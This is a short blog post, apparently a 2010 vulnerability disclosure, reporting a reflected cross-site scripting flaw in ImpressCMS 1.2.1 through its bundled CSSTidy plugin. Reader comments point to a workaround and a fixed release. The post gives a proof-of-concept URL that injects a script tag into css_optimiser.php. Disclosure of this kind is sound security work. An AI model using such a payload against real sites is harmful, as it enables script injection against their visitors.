A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.
PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Sunday, July 11, 2010
Subscribe to:
Post Comments (Atom)
please be aware, this is not an issue with impresscms, it is an issue with csstidy which is used by many projects.
ReplyDeleteA workaround has been published by the ImpressCMS project: http://community.impresscms.org/modules/smartsection/item.php?itemid=494
ReplyDeleteA security release will be upcoming.
An updated release removing the vulnerability in CSSTidy has been published by ImpressCMS - http://community.impresscms.org/modules/smartsection/item.php?itemid=495
ReplyDeleteGood post. Thanks for sharing.
ReplyDelete